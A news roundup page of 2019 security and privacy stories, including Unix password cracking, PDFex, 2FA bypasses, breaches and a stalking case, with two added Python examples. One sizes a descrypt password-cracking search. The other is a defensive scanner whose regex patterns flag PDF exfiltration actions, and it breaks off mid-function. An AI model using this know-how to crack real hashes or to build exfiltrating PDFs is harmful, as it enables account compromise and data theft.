Repairs & Upgrades

October 14, 2019 »

Stalker found pop star by searching eyes’ reflections on Google Maps

By Lisa Vaas

A predator has confessed to stalking and attacking a young Japanese pop star by zooming in on the reflections in her eyes from photos she posted on social media.

Oriental Daily reports that 21-year-old Japanese idol Matsuoka Nagato was attacked on her way home by someone who covered her head with a towel, wrestled her to the ground and physically assaulted her, injuring her face in the struggle.

A 26-year-old man by the name of Sato was arrested and confessed to police that he’d used the star’s selfies to figure out where she lived. Each of her pupils reflected the nearby streetscape, which he plugged into the street map function of Google Maps to find matching bus stops and scenery.

Sato told police that he waited at Matsuoka’s bus stop until his victim showed up, then followed her home on the night of 1 September.

He also confessed to observing other reflections in Matsuoka’s eyes: curtains, windows, and the angle of the sun. That enabled Sato to guess at which floor she lived on in the building.

AsiaOne notes that there have been several high-profile stalking and assault cases of J-pop stars in recent years, and fans have called for better protection of their female idols as a result. Such incidents have included one against Maho Yamaguchi, ex-member of pop group NGT48, who spoke out in January about an alleged assault in which two men entered her home and tackled her.

For her part, singer Mayu Tomita tried to report a stalker 12 days before he stabbed her 34 times. Leading up to the attack, police had dismissed the threat, in spite of Tomita telling them that she was getting several social media messages a day, threatening to kill her.


Soldering spy chips inside firewalls is now a cheap hack, shows researcher

By John E Dunn

The tiny ATtiny85 chip doesn’t look like the next big cyberthreat facing the world, but sneaking one on to a firewall motherboard would be bad news for security were it to happen.

In fact, this has already happened as part of a project by researcher Monta Elkins, designed to prove that this sort of high-end hardware hack is no longer the preserve of nation-states.

Elkins soldered the 5mm x 5mm ATtiny85 chip from an Arduino board to his test firewall’s circuit board just in front of the system’s serial port.

After reading his account of the proof of concept in Wired, it’s not hard to grasp why soldering tiny chips to circuit boards is a threat – they’re impossible to see let alone detect once they’re installed inside equipment.

The proof of concept is also cheap, requiring little more than some knowhow, access to the supply chain of current products, and a few hundred dollars for parts.

Rumors of secret chips, or secret interfaces on legitimate chips, have long been the stuff of legend, but the implication of Elkins’ work is that anyone could now do this.


Computing enthusiast cracks ancient Unix code

By Danny Bradbury

Old passwords never die – they just become easier to decode. That’s the message from a tight-knit community of tech history enthusiasts who have been diligently cracking the passwords used by some of the original Unix engineers four decades ago.

On 3 October, an enthusiast on the Unix Heritage Society mailing list asked a question about cracking passwords stored in old Unix systems. The source code for various revisions of Unix from the seventies onward is available online for anyone to download, and these revisions store the password hashes for various staff members in the /etc/passwd file.

Unix hashed these passwords by running them through an algorithm called descrypt (also known as crypt(3)), which used the original DES encryption algorithm and limited the effective password length to eight characters. This was good enough to stop people recovering the password from the original hashes at the time, but 40 years on, computers are a little bit faster.

Developer Leah Neukirchen replied that she’d cracked several of them contained in a version of the BSD operating system from January 1980. However, she still hadn’t managed to crack Ken Thompson’s password. Thompson is one of the fathers of Unix. His original work on its predecessor Multics formed the basis for much of the operating system.

Neukirchen complained:

I never managed to crack Ken’s password with the hash ZghOT0eRm4U9s, and I think I enumerated the whole 8 letter lowercase + special symbols key space.
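As an added illustration of the crypt(3) scheme described above (this is code written for this page, not from the mailing-list thread or from Neukirchen), the following Python reproduces the two preprocessing steps that bound the search: decoding the two-character salt and turning the password into a DES key. It does not implement DES itself. The quoted hash is used only to read its salt, and the assumption that “special symbols” means ASCII punctuation is mine; the thread does not say which symbols were tried.

```python
import string

# Added example: descrypt / crypt(3) preprocessing, written for this page.
# It does not implement DES, only the parts that explain why an
# eight-character limit and a 12-bit salt bound the attacker's work.

# The 64-symbol alphabet crypt(3) uses for salts and hash output.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hash quoted in the article, used here only for its two salt characters.
KEN_HASH = "ZghOT0eRm4U9s"


def is_descrypt_hash(value: str) -> bool:
    """A classic DES crypt hash is 13 chars: 2 salt chars + 11 chars encoding 64 bits."""
    return len(value) == 13 and all(c in ITOA64 for c in value)


def salt_from_hash(value: str) -> int:
    """Decode the 12-bit salt: first char gives bits 0-5, second char bits 6-11."""
    return ITOA64.index(value[0]) | (ITOA64.index(value[1]) << 6)


def des_key_from_password(password: str) -> bytes:
    """Build the 8-byte DES key the way classic crypt(3) does.

    Only the first eight characters are used (shorter passwords are padded
    with NUL). Each byte is shifted left by one: the character's high bit
    falls off the top and the low bit, which is DES's ignored parity
    position, is left zero. Net effect: 7 useful bits per character,
    56 bits total, and nothing after the eighth character changes the hash.
    """
    raw = password.encode("latin-1")[:8].ljust(8, b"\0")
    return bytes((c << 1) & 0xFF for c in raw)


def same_des_key(a: str, b: str) -> bool:
    """True when crypt(3) would feed identical DES keys for both passwords."""
    return des_key_from_password(a) == des_key_from_password(b)


def keyspace(alphabet: str, max_len: int = 8) -> int:
    """Number of candidate passwords of length 1..max_len over alphabet."""
    n = len(alphabet)
    return sum(n ** k for k in range(1, max_len + 1))


# Assumption: "special symbols" means ASCII punctuation; the thread does not say.
LOWER_PLUS_SPECIAL = string.ascii_lowercase + string.punctuation


def worst_case_seconds(candidates: int, hashes_per_second: float) -> float:
    """Time to exhaust a key space at an assumed (not measured) hash rate."""
    return candidates / hashes_per_second


if __name__ == "__main__":
    print("valid descrypt hash:", is_descrypt_hash(KEN_HASH))
    print("salt:", salt_from_hash(KEN_HASH))
    print("'password1' and 'password2' share a key:", same_des_key("password1", "password2"))
    total = keyspace(LOWER_PLUS_SPECIAL)
    print("lowercase+punctuation, up to 8 chars:", total)
    print("hours at an assumed 1e9 hashes/s:", worst_case_seconds(total, 1e9) / 3600)
```

Two things fall out of running it. Any two passwords that share their first eight characters produce the same DES key, so a cracker never needs to try longer candidates. And the whole lowercase-plus-punctuation space up to eight characters is on the order of 10^14 candidates, which at the illustrative rate of a billion hashes per second is a job of a day or two rather than years; the 12-bit salt only multiplies the work for an attacker targeting many hashes at once, not one.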


Hacker wants $300 for 250,000 records stolen from sex worker site

By Lisa Vaas

A hacker has stepped through a hole in vBulletin web software to steal all email addresses from a Dutch website for prostitution and escort customers and for sex workers themselves,

According to local news outlet NOS, the total number of accounts whose email addresses were exposed is 250,000. Besides the email addresses, the hacker also got at user names, IP addresses and passwords, NOS reports.

The passwords are reportedly encrypted. We don’t have details of exactly how they’re encrypted, but as we reported in June, vBulletin is one of the content management systems (CMSes) that are properly securing passwords. That means that it’s doing hashing right – hashing being one part of the encrypting/hashing/salting recipe for securing passwords – by using bcrypt, a password hashing function that’s resistant to GPU-based parallel computing cracks.

(Here’s a primer on how to securely store users’ passwords that delves into the details.)

On Thursday, the site’s main moderator announced the breach and advised users to change their login details, in spite of passwords apparently not being affected.

According to the notification, found out about the breach from its external software supplier, vBulletin, which reported that a software error was discovered in its software that gave access to the site’s database. said that vBulletin took action “as quickly as possible,” releasing a software patch that the site tested and promptly implemented.

The moderator said that the hacker has put the email addresses up for sale online. NOS said that they’re asking $300.

Visitors to swap experiences and tips on the site. Prostitution is legal, and heavily regulated, in the Netherlands. But that doesn’t mean that visitors to want their association with the industry to be publicly broadcast, be they sex workers or clients.


Most Americans don’t have a clue what https:// means

By Lisa Vaas

55% of US adults couldn’t identify an example of 2FA, and only 30% knew that starting a URL with https:// means that the information sent to that site is encrypted.

… and the Pew Research Center discovered plenty of other sobering facts about what Americans know and don’t know about cybersecurity and privacy.

The survey

The Pew Research Center conducted a survey which tested Americans and their digital knowledge, asking 4,272 adults in the US a series of 10 questions about a range of digital topics, such as cybersecurity or who the bearded guy in the photo was (answer: Twitter co-founder Jack Dorsey. Only 15% got that one right, but how that fits into cybersecurity and privacy concerns is a question that Pew didn’t address.)

How well the respondents did depended a great deal on what the topic, term or concept was, as well as how old they were and what their level of educational attainment was. Young people, you did better. College-educated people, you did better, too.

Respondents did A+ work when it came to identifying where you can get phished, for example. In an email? On social media? In a text message? On a website? Or how about the correct answer: “all of the above?” Ding-ding-ding, we have a winner! 67% of Americans knew that you can get phished all over the place.

Respondents aced the question about what cookies are, as well – 62% correctly said that websites that use cookies can track your visits and activity on the site.

Where we fall flat on our 2FA faces

Here’s where we aren’t so smart: only 28% of adults could identify an example of 2FA, which is one of the most important ways that people can protect their personal information on sensitive accounts.

To be fair, the question tossed a number of images of security strategies together: if you go to pages 14-15 of the survey, which you can download here, you’ll see that respondents were asked to pick the image that represented 2FA.


Hackers bypassing some types of 2FA security FBI warns

By John E Dunn

Some types of two-factor authentication (2FA) security can no longer be guaranteed to keep the bad guys out, the FBI is reported to have warned US companies in a briefing note circulated last month.

FBI reporting identified several methods cyber actors use to circumvent popular multi-factor authentication techniques in order to obtain the one-time passcode and access protected accounts.

The simplest and therefore most popular bypass is SIM swap fraud, in which the attacker convinces a mobile network (or bribes an employee) to port a target’s mobile number, allowing them to receive 2FA security codes sent via SMS text.

Naked Security now regularly covers this kind of hack, almost always because it was used to empty people’s bank accounts, steal cryptocurrency from wallets or exchange accounts, or to attack services such as PayPal.

From the victim’s point of view, it’s the ultimate gotcha – a security weakness caused by the failings of a service provider they can do little to prevent.

A second technique is the man-in-the-middle phishing attack that tricks people into entering their credentials and OTP code into a fake site which then instantly passes them to the real one. A good example of this is last month’s attack on YouTube users, some of whom had 2FA turned on.

More advanced still is session hijacking where the site is genuine, but the credentials and codes are stolen from traffic travelling to and from the user.

According to the FBI, in one case from 2019, a security vulnerability on the website of a bank allowed a hacker to bypass PIN and security questions after phishing basic credentials.


October 10, 2019 »

Twitter used 2FA phone numbers for targeted advertising

By John E Dunn

Does Twitter know your email address and your phone number?

Depending on how long ago you started using Twitter, it’s a near certainty the company has at least one of these – the email address – because people often hand that over when registering.

As for phone numbers (usually mobile numbers) these are entered to enable Twitter’s two-factor authentication (2FA) security, Login Verification.

We mention this because Twitter this week made the ‘you have to be kidding’ admission that it might have “inadvertently” handed this data from some users to advertisers as part of the company’s Tailored Audiences system that targets users’ feeds with ads.

As apologies go, this one is unsatisfactory, particularly if you like Twitter but think ‘targeted’ ads sound intrusive:

We’re very sorry this happened and are taking steps to make sure we don’t make a mistake like this again.

Twitter glosses over some of the detail so let’s explain how Tailored Audiences is supposed to work.


California outlaws facial recognition in police bodycams

By Lisa Vaas

On Tuesday, California passed into law a three-year block of the use of facial recognition in police bodycams that turns them into biometric surveillance devices.

This isn’t surprising, coming as it does from the state with the impending, expansive privacy law – California’s Consumer Privacy Act (CCPA) – that’s terrifying data mongers.

As it is, in May, San Francisco became the first major US city to ban facial recognition. It might well be a tech-forward metropolis, in a state that’s the cradle of massive data gobbling companies, but lawmakers have said that this actually confers a bit of responsibility for reining in the privacy transgressions of the companies headquartered there.

When facial recognition gets outlawed, lawmakers point to the many tests that have found high misidentification rates. San Francisco pointed to the ACLU’s oft-cited test that falsely matched 28 members of Congress with mugshots.

The ACLU of Northern California repeated that test in August, finding that the same technology misidentified 26 state lawmakers as criminal suspects.

One of the misidentified was San Francisco Assemblyman Phil Ting, the lawmaker behind the bill that passed and which was signed into law by Gov. Gavin Newsom on Tuesday: AB1215.

The law, which goes into effect on 1 January 2020 and which expires on 1 January 2023, prohibits police from “installing, activating, or using any biometric surveillance system in connection with an officer camera or data collected by an officer camera.”


Job seekers are scrubbing clean their social media accounts

By Lisa Vaas

We’re thrilled to pass along the findings of a new report that says that job seekers are doing what we’ve been begging them (as well as those people who are just fine with their current jobs, thank you very much) to do for years: button down privacy on their social media accounts, and mop up the splatter tracks of their nonprofessional gallivanting if they want to keep it from squashing their career opportunities.

After all, while we’re all for free speech, those rights don’t stop bosses from firing us if we publicly diss them or the company, and they don’t mean that recruiters are required to consider your candidacy if you do something like bad-mouth a previous employer on social media.

The finding comes from JDP, a candidate screening company in the US that surveyed 2,007 US participants about what they’re hiding from employers and how far they’ll go to keep it hidden.

According to its latest study, 43% of respondents enable privacy settings to keep material hidden from current employers and from whatever social media screenings future employers might run on them. In fact, one in four have every platform set to private. Forty percent of respondents say they’ve gone so far as to create alias accounts.

It’s not that they’re not posting career landmines: one in five admit to posting material that could jeopardize a current or future opportunity, JDP found.


October Patch Tuesday: Microsoft fixes critical remote desktop bug

By Danny Bradbury

Microsoft fixed 59 vulnerabilities in October’s Patch Tuesday, including several critical remote code execution (RCE) flaws.

One of the most significant was a flaw (CVE-2019-1333) in the company’s Remote Desktop Client that enables a malicious server to gain control of a Windows computer connecting to it. An attacker could accomplish this using social engineering, DNS poisoning, a man-in-the-middle attack, or by compromising a legitimate server, Microsoft warned. Once they compromised the client, they could execute arbitrary code on it.

Another critical RCE vulnerability affected the MS XML parser in Windows 8.1, Windows 10, Windows Server 2012 through 2019, and RT 8.1. An attacker can trigger the CVE-2019-1060 flaw through a malicious website that invokes the parser in a browser.

A memory corruption bug in Edge’s Chakra scripting engine (CVE-2019-1366) also enables a malicious website to trigger RCE, operating at the user’s account privileges, while an RCE vulnerability in Azure Stack, Microsoft’s on-premises extension of its Azure cloud service, escapes the sandbox by running arbitrary code with the NT AUTHORITY\system account.

The company also patched a critical RCE bug in VBScript that lets an attacker corrupt memory and take control of the system, usually by sending an ActiveX control via a website or Office document. Hopefully bugs in VBScript will become less important over time now that the company has deprecated the language.


Deepfakes have doubled, overwhelmingly targeting women

By Lisa Vaas

OK, let’s pull deepfakes back from the nail-biting, perhaps hyperbolic, definitely hyperventilating, supposed threats to politicians and focus on who’s really being victimized.

Unsurprisingly enough, according to a new report, that would be women.

96% of the deepfakes being created in the first half of the year were pornography, mostly being nonconsensual, mostly casting celebrities – without compensation to the actors, let alone their permission.

The report, titled The State of Deepfakes, was issued last month by Deeptrace: an Amsterdam-based company that uses deep learning and computer vision for detecting and monitoring deepfakes and which says its mission is “to protect individuals and organizations from the damaging impacts of AI-generated synthetic media.”

According to Deeptrace, the number of deepfake videos almost doubled over the seven months leading up to July 2019, to 14,678. The growth is supported by the increased commodification of tools and services that enable non-experts to churn out deepfakes.

One recent example was DeepNude, an app that used a family of dueling computer programs known as generative adversarial networks (GANs): machine learning systems that pit neural networks against each other in order to generate convincing photos of people who don’t exist. DeepNude not only advanced the technology, it also put it into an app that anybody could use to strip off (mostly women’s) clothes so as to generate a deepfake nudie within 30 seconds.

We saw another faceswapping app, Zao, rocket to the top of China’s app stores last month, sparking a privacy backlash and just as quickly getting itself banned from China’s top messaging app service, WeChat.

While Deeptrace says most deepfakes are coming from English-speaking countries, it says it’s not surprising that it’s seeing “a significant contribution to the creation and use of synthetic media tools” from web users in China and South Korea.

Deeptrace says that non-consensual deepfake pornography accounted for 96% of the total number of deepfake videos online. Since February 2018 when the first porn deepfake site was registered, the top four deepfake porn sites received more than 134 million views on videos targeting hundreds of female celebrities worldwide, the firm said. That illustrates what will surprise approximately 0% of people: that deepfake porn has a healthy market.


TOMS hacker tells people to log off and enjoy a screenless day

By Lisa Vaas

TOMS seems like a really nice shoe company, and it just got hacked in a really nice way.

Motherboard Vice reports that on Sunday, a hacker going by the name Nathan emailed TOMS subscribers and told them to log off, go out and enjoy the day:

hey you, don’t look at a digital screen all day, there’s a world out there that you’re missing out on.

just felt some people need that.

CEO Jim Alling acknowledged the hack in an email to customers, telling them that an unauthorized email was sent out to the TOMS community by “an individual who gained access to a TOMS account in a third-party system.”

The company is asking members of its mailing list to refrain from clicking on any links or replying to the pleasant but unauthorized and illegal message.

TOMS is investigating the incident, but Alling said that the company immediately took steps to deactivate the account and implement additional layers of account security. He said that TOMS had spent 24 hours doing “close examination” with the company’s partners, but so far, it doesn’t look like full payment card details were accessed or that TOMS’ marketing customer email list was downloaded.

Well, no, why would he have done that? That would have taken a lot of time. Plus it would have been rude, Nathan told Vice:

I had TOMS hacked for quite a while, but with a busy life and no malicious intent, it was pretty useless to have them hacked.

Of course, he could have just responsibly disclosed whatever security hole he exploited, but for reasons he didn’t give, Nathan didn’t consider that an option:

By this point responsible disclosure is not a option. So I thought I [may] as well send out a message I believe in just for fun. End purpose was to spread my message to a large amount of people.


October 8, 2019 »

Nationwide facial recognition ID program underway in France

By Lisa Vaas

France is creating – and speeding up the rollout of – a nationwide program using facial recognition to create legal digital identities for its citizens.

The program is called Alicem – an acronym for “certified online authentication on mobile”. It was developed jointly by the Ministry of the Interior and the National Security Title Agency (ANTS), which maintain that it will a) simplify access to online services, b) fight identity theft, c) keep the biometric data safe on the phone and erase it once identity has been validated, and d) keep third parties from getting at the data.

France had planned to launch the Android-only app by Christmas. But now, it’s greasing the wheels and plans to have it up and running in November 2019, Bloomberg reports.

Privacy watchdogs are not pleased

The country’s privacy regulator, CNIL, says the program breaches the EU’s rule of consent. Europe’s General Data Protection Regulation (GDPR) mandates free choice. Bloomberg spoke to Emilie Seruga-Cau, the head of law enforcement at CNIL, who said that the independent regulator has made its concerns “very clear.”

The publication, which was able to check out the app, reports that Alicem will be the only way for French citizens to create a legal digital ID, and facial recognition will be the only way to do it.

It will require that residents use an Android app to take one-time selfie videos that capture their expressions and movements at different angles, to compare with photos of themselves stored in their biometric passports.

Meanwhile, the French privacy rights group La Quadrature du Net (LQDN) has filed a lawsuit over the program in France’s highest administrative court.


Facebook’s Libra cryptocurrency dealt blow by PayPal’s departure

By John E Dunn

Has PayPal just dealt a body blow to Facebook’s Libra cryptocurrency?

In emails sent to journalists last week, the company abruptly announced that it was leaving the Libra Association, the 28-strong organization of global companies and non-profits, including Facebook, set up to oversee its roll out.

Given that Libra was only announced in June, with a proposed launch in 2020, to the untrained eye this will look like an unexpected change of heart.

Adopting the principle of the less said the better, the company offered no explanation as to why it decided to bail from Libra so quickly, stating only that:

PayPal has made the decision to forgo further participation in the Libra association at this time and to continue to focus on advancing our existing mission and business priorities as we strive to democratize access to financial services for underserved populations.

But, of course:

We remain supportive of Libra’s aspirations and look forward to continued dialogue on ways to work together in the future.

While it’s true that Libra still has 27 backers, losing PayPal at this stage is a bit like discovering your quarterback has gone on vacation the night before the Super Bowl.

Adding to the instability is an unconfirmed report in The Wall Street Journal that two other founder members, MasterCard and Visa, might also be reconsidering their involvement.


Android devices hit by zero-day exploit Google thought it had patched

By John E Dunn

Google has admitted that some Android smartphones have recently become vulnerable to a serious zero-day exploit that the company thought it had patched for good almost two years ago.

The issue came to light recently when Google’s Threat Analysis Group (TAG) got wind that an exploit for an unknown flaw, attributed to the Israeli NSO Group, was being used in real-world attacks.

Digging deeper into the exploit’s behavior, Project Zero researcher Maddie Stone said she was able to connect it to a flaw in Android kernel versions 3.18, 4.14, 4.4, and 4.9 that was fixed in December 2017 without a CVE being assigned.

Somehow, that good work was undone in some later models – or never applied in the first place – leaving a list of vulnerable smartphones running Android 8.x, 9.x and the preview version of 10.

The flaw is now identified as CVE-2019-2215 and described as a:

Kernel privilege escalation using a use-after-free vulnerability, accessible from inside the Chrome sandbox.

The result? Full compromise of unpatched devices, probably served from a malicious website without the need for user interaction, in conjunction with one or more other exploits. It also requires that the attacker has installed a malicious app.


Facebook urged by governments to halt end-to-end encryption plans

By Danny Bradbury

Tensions between Facebook and three governments escalated last week after the US, the UK, and Australia officially urged Facebook to halt its plans for end-to-end encryption.

The row concerned Facebook CEO Mark Zuckerberg’s publication of a privacy manifesto in March this year, in which he promised to extend the company’s end-to-end encryption work and introduce the technology into its core Facebook Messenger product.

A thorn in their sides

An online messaging service can encrypt your data in two ways. It can store the encryption key on the provider’s own servers, enabling law enforcement to subpoena it and unlock your messages. Alternatively, end-to-end encryption stores the key to a messaging session exclusively on the participating computers, meaning that the tech company has nothing to give the authorities. This means that even if law enforcement accesses a person’s messages, they wouldn’t be able to read the contents.

End-to-end encryption is a thorn in the side of governments who want to track criminals. On Friday, US Attorney General William Barr published an open letter to Zuckerberg, cosigned by UK Home Secretary Priti Patel, acting United States Secretary of Homeland Security Kevin McAleenan, and Australian Home Affairs Minister Peter Dutton. It laid out its demands clearly in the first paragraph:

We are writing to request that Facebook does not proceed with its plan to implement end-to-end encryption across its messaging services without ensuring that there is no reduction to user safety and without including a means for lawful access to the content of communications to protect our citizens.


Social media platforms can be forced to delete illegal content worldwide

By Lisa Vaas

Individual countries can order Facebook and similar content providers to take down posts, photos and videos worldwide, not just in their own countries, Europe’s top court said on Thursday.

Facebook can’t challenge this decision, which extends the EU’s internet-related laws beyond its own borders.

In Thursday’s decision, the EU Court of Justice said that platforms can be ordered to remove not just a copy of illegal content that somebody’s complained about. They can also be ordered to proactively seek out all identical copies of the content and scrub them too, rather than sitting back and waiting for every instance to be reported.

What it means: copies of defamatory or other illegal content that’s posted to secret places – private groups on Facebook, for example – can’t hide away from the scrub brush.

The ruling stemmed from a case filed in 2016. It involved a comment made on Facebook about an Austrian politician – Eva Glawischnig-Piesczek, former leader of the Austrian Green Party – that an Austrian court decreed was insulting and defamatory. As the New York Times reports, she sued the social network to expunge online comments that called her a “lousy traitor,” “corrupt oaf” and member of a “fascist party.”

Facebook initially refused to take down the post. Glawischnig-Piesczek started in Austrian courts, suing Facebook over the matter. After Austrian courts concluded that the comments were defamatory and reputation-damaging, Glawischnig-Piesczek demanded that Facebook erase the original comments worldwide, not just within the country, as well as posts with “equivalent” remarks.

She took the case on up to the top EU court, the European Court of Justice.


October 7, 2019 »

Wi-Fi signals let researchers ID people through walls from their gait

By Lisa Vaas

Yasamin Mostofi asks us to imagine this scenario: police have video footage of a robbery. They suspect that one of the robbers is hiding in a house nearby.

Can a pair of off-the-shelf Wi-Fi transceivers, located outside the house, look through the walls to see who’s inside?

That’s easy to answer, since we’ve seen it done before.

In 2015, MIT researchers created a device that could discern where you are and who you are from the other side of a house, through a wall, by using the human body’s reflections of wireless transmissions. It detected gestures and body movements as subtle as the rise and fall of a person’s chest, even though the subjects were invisible to the naked eye.

Then, 11 months ago, a team of researchers at University of California Santa Barbara demonstrated using a streamlined set of technologies – just a smartphone and some clever computation – how to see through walls and successfully track people in 11 real-world locations, with high accuracy.

But here’s a new question: Can Wi-Fi signals be used to identify the person in the house? Can off-the-shelf hardware determine if whoever’s in the house is one of the people in the video surveillance footage police are scrutinizing?

Yes. UC Santa Barbara researchers are back again to show that they’ve built on their previous work: It can be done by analyzing people’s walking gaits and comparing them to the gait of whoever’s in the CCTV footage.


Buying a new laptop? Here’s how to secure it

By Maria Varmazis

October is National Cybersecurity Awareness Month (NCSAM) and this year’s theme of ‘Own IT. Secure IT. Protect IT.’ aims to encourage personal accountability for security. Computer security is a broad and complex subject but the truth is that criminals like low-hanging fruit and getting the basics right affords you an awful lot of protection.

Naked Security asked me to come up with an easy to follow guide that will help you get the security basics right if you’re buying a new laptop.

1. Have a plan for your data

Ah, the thrill of buying a new laptop. It’s so much faster than your last one! It can do all these great new things! It has so much more space! New lid space for stickers!

Well, it’s thrilling if it was planned, that is.

Often enough we end up buying a new laptop in something of an emergency situation, when the old one is finally so slow that it’s unusable or has a catastrophic failure. When the old laptop’s breakdown is a bit sudden, you might be caught trying to do data rescue on a fried computer, which is a frustrating and time-consuming situation at best.

Spare future-you a lot of grief by making sure you keep your data freshly backed up in at least one place, separate from your old laptop. This can include cloud-synced backups via services like Dropbox, Carbonite, or iCloud, or periodic physical backups onto an external hard drive. Mac users can do this on a schedule via Time Machine, and Windows 10 offers its own automatic backup option under “Backup and Restore” in the Control Panel. Additionally, many external hard drive makers bundle their own backup software with the drives they make.

So yes, back it all up, in one place, so you know you have everything that you need without the time pressure and frustration of trying to dig it all out from a dead or dying hard drive.


WhatsApp vulnerability could compromise Android smartphones

By John E Dunn

A researcher has released details of a WhatsApp remote code execution (RCE) flaw it is claimed could be used to compromise not only the app but the mobile device the app is running on.

Reported to Facebook some weeks ago by a researcher called ‘Awakened’, the critical issue (CVE-2019-11932) affects users of the Android versions of the app, specifically versions 8.1 and 9.0 although not, apparently, version 8.0 (Apple’s iOS doesn’t appear to be affected).

It’s described as a double-free memory vulnerability in a WhatsApp image preview library called, and some aspects of how it might execute remain unclear.

The researcher says an attack would involve first sending a malicious GIF image using any channel, that is by email, a rival messaging app, or sent direct through WhatsApp itself.

If WhatsApp is being used, and the attacker (or hapless intermediary) is on the contacts list of the user as a friend, apparently this GIF would download to the device automatically.

Execution would happen when the recipient subsequently opens the WhatsApp Gallery even if no file is selected or sent. Writes Awakened:

Since WhatsApp shows previews of every media (including the GIF file received), it will trigger the double-free bug and our RCE exploit.

To back this up, Awakened has released a video showing the sequence of events running on WhatsApp v2.19.203.


£3 billion Safari iPhone privacy lawsuit given go-ahead

By Danny Bradbury

A UK class action privacy lawsuit against Google can go ahead, according to the UK Court of Appeal. The suit claims up to £3bn ($3.9bn) in damages based on Google’s manipulation of Apple’s Safari browser in 2011-12.

In 2010, Apple included anti-tracking technology in Safari that would stop advertising companies from inserting cookies into the browser.

Google developed a workaround, enabling it to put cookies from its DoubleClick advertising technology into users’ browsers anyway. Safari’s anti-tracking technology at the time made an exception for sites that users interacted with, so Google included code in advertisements that made it look as though the user was filling out a form.

This technique enabled the company to place cookies in Safari. Those small files could tell when the user visited a site participating in the DoubleClick advertising program, how long they spent on the site, what pages they visited, and in some cases even their rough geographic location.

The complaint calls this data ‘browser generated information’ or BGI, and says that over time it allowed Google to draw more conclusions about people, helping it to understand things like their sexual orientation, religious views, and political leanings. The company used this data to segment people into customer groups, which it used to target them with advertisements from its customers. So, in other words, Google bypassed Apple’s technology protections to carry on its advertising operations as usual.


Hacker’s parents sentenced for selling his cryptocurrency

By Lisa Vaas

All you brilliant kids who use your fine brains to do idiotic things like, say, hack TalkTalk and the EtherDelta exchange, do yourself a favor: when you wind up in jail, warn your parents not to “help” you by transferring your stolen cryptocurrency.

That’s what happened to TalkTalk and (alleged) EtherDelta hacker Elliott Gunton, whose parents have both been handed suspended sentences after admitting to having removed some of his ill-gotten cryptocurrency from a hardware wallet.

It was a “misguided” attempt to help him, according to what Judge Stephen Holt told mom and dad, Carlie Gunton and Jason Gunton, on Wednesday. The Eastern Daily Press – a local paper in the Guntons’ hometown of Norwich, in the English county of Norfolk – quoted the judge:

You misguidedly tried to help your son and what you did didn’t help him at all, and I’m sure it’s something you’re regretful about.

History of a youthful, repeat offender

Elliott Gunton, now 20, was convicted in 2016 at the age of 16 for his role in attacking the UK broadband and telecom giant TalkTalk.

In 2017, the UK’s Information Commissioner’s Office (ICO) fined TalkTalk £400,000 for security failings that led to the attack and which allowed customer data to be accessed “with ease”. The attacker accessed the personal information of more than 150,000 customers, including the sensitive financial data of more than 15,000 people (sensitive data that TalkTalk’s CEO, bizarrely enough, had said that the company wasn’t required to encrypt).


October 3, 2019 »

No federal privacy law will make it in the US this year, sources say

By Lisa Vaas

You know about that one, much-hemmed-and-hawed-over, GDPR-ish, national, US privacy law? The one we don’t have? The lack of which means the country’s data privacy landscape is made up of a crazy quilt of state laws?

Not happening. Not this year.

In spite of the US Federal Trade Commission (FTC) marching down to Capitol Hill to beat the drum for a unified federal privacy law (and more regulatory powers to enforce it), and in spite of both the House and Senate holding hearings on privacy legislation, transparency about how data is collected and shared, and the stiffening of penalties for data-handling violations, the US is not likely to see an online privacy bill come before Congress this year.

That’s according to Reuters’ anonymous sources, who say that lawmakers haven’t managed to agree on issues such as whether the bill would preempt state rules.

And when we’re talking about state rules, we’re talking about the elephant in the room: California’s Consumer Privacy Act (CCPA), which goes into effect on 1 January 2020.

In lieu of a federal law – the one we’re not getting this year because nobody can agree on what it should do – the CCPA might turn into the ipso facto privacy rule of the land. Tech companies are terrified that it’s going to be strict, and it’s going to be expensive for all the companies that slurp up consumer data to track us, market at us and profit from selling our data … or which screw up by fumbling that data, or which quietly pickpocket that data, as the case may be.

In hearings over possible privacy legislation – which neither you nor I have been invited to, fellow citizen, though tech companies have – lawmakers and online advertising representatives have grumbled about tough laws such as the CCPA and the EU’s General Data Protection Regulation (GDPR), saying that such strict laws could lead to businesses being swamped by fines and compliance costs, and that consumers have been buried in a blizzard of required notices and privacy policies they don’t bother to read.


PDF encryption standard weaknesses uncovered

By John E Dunn

You would be forgiven for thinking that encrypting PDFs, before they are stored or sent via email, keeps their contents away from prying eyes.

But according to researchers in Germany, it might be time to revisit that assumption after they discovered weaknesses in PDF encryption which could be exploited to reveal the contents of a file to an attacker.

Dubbed ‘PDFex’ (PDF exfiltration), the weaknesses documented in Practical Decryption exFiltration: Breaking PDF Encryption by researchers from Ruhr University Bochum and the Münster University of Applied Sciences, offer two attack methods, each with three variants that depend on which PDF viewer is used to open a target document.

Attack #1 – direct exfiltration

The PDF standard ships with native AES symmetric encryption which secures documents using a password communicated to the recipient (arguably a weakness in itself) or, in some installations, through public key encryption.

However, the researchers quickly discovered a hole in this method, so glaringly obvious that it’s surprising nobody’s noticed it before. The PDF standard allows for partially encrypted documents that include a mix of both encrypted and unencrypted sections, and does not include integrity checking. This means an attacker can add additional sections or interactive Actions to an encrypted PDF without raising any alarms, said the researchers in their overview:

The most relevant object for the attack is the definition of an Action, which can submit a form, invoke a URL, or execute JavaScript.

Actions can be set to run when a document is opened or something within the document is clicked on, and send the decrypted contents to an attacker’s server.
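The combination the researchers describe, plaintext Action objects sitting inside a file that is otherwise encrypted, is something a mail gateway or document scanner can look for before a viewer ever opens the file. The following triage script is an added example written for this page; it is not code from the PDFex researchers, their paper, or any PDF library. It scans a raw PDF for an /Encrypt reference plus SubmitForm, URI and JavaScript actions (the three kinds named above) and their /OpenAction and /AA triggers. The two sample PDFs are constructed by hand for the example, and the collector URL in the first one is a made-up placeholder.

```python
import re
from typing import Dict, List, Tuple

# Action subtypes named in the PDFex overview: each can carry document
# content to a destination the attacker chooses (form submit, URL, script).
EXFIL_ACTION_NAMES = (b"SubmitForm", b"URI", b"JavaScript")

OBJECT_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
ACTION_RE = re.compile(rb"/S\s*/(" + b"|".join(EXFIL_ACTION_NAMES) + rb")\b")
TRIGGER_RE = re.compile(rb"/(OpenAction|AA)\b")   # fire on open / on event, no click needed
ENCRYPT_RE = re.compile(rb"/Encrypt\b")


def is_encrypted(pdf: bytes) -> bool:
    """True when the trailer references an /Encrypt dictionary."""
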